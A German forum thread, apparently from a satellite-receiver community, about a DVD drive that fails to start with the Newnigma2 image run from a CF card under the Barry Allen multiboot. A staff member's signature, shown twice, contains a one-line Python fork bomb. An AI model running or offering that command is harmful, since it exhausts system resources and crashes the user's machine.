DVD Laufwerk startet nicht mit Newnigma2

Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

• DVD Laufwerk startet nicht mit Newnigma2

Ja hallo!
      Bin neu hier und hab eine Frage zu eurem Image betreffend DVD Player.
      Hab das aktuelle oozoon im flash und newnigma2 auf cfcard.
      ist ein super Image nur das DVD laufwerk startet nicht. Mit allen anderen Images (NabilBlackhole das ich sonst nutze) gibts da kein Problem.
      Nur wenn ich die Box neu starte und schon eine DVD eingelegt habe wierd sie erkannt. Sobald ich sie auswerfen lasse und wieder reinlege startet das Laufwerk nichtmehr.
      Würd gern euer Image nutzen da ich es sonst sehr klasse finde. Wär nett wenn mir jemand helfen könnte.
      Lg Tomi6
    • RE: DVD Laufwerk startet nicht mit Newnigma2

Bei mir das gleiche Problem! ?(
      Und wenn die DVD dann mal läuft, ist mir die Bedienung der Menüs nicht ganz klar. Welche Tasten dienen zur Steuerung? Muß man das DVD-Laufwerk eventuell extra in diesem Image anmelden / konfigurieren? Haben andere User das gleiche Problem, oder sind wir zwei hier die Einzigen? :(
      Gruß vom Frischling...
    • Unsere Images sind images fürn flash und nicht geeignet für Barry Allen.Wir versuchen alles um images einfach für den user zu gestalten aber in BA sind einige sachen nicht verfügbar weil das entweder ignoriert wird oder nicht passt.
      Wenn also DVD net geht liegt das am image weil unsere images das anders handhaben.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Lest ihr was ich schreibe ?( ?( ?(
      Wenn ihr fehler postet schreibt welches image ihr benutzt und wo es bzw wie es installiert ist ansonsten kann euch keiner helfen und ich schließe den Beitrag.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Ok Danke für die Antwort kati910. Ich hab oozoon mit BA im Flash und newnigma auf cf, somit ist das der Fehler.
      Bringt es was wenn ich das newnigma ins Flash gebe und dan trozdem BA installiere um ander Images auf cfcard verwenden zu können oder wierd dann das DVD-Laufwerk auch nicht gehn?
      ansonst echt tolles Image. Super Arbeit.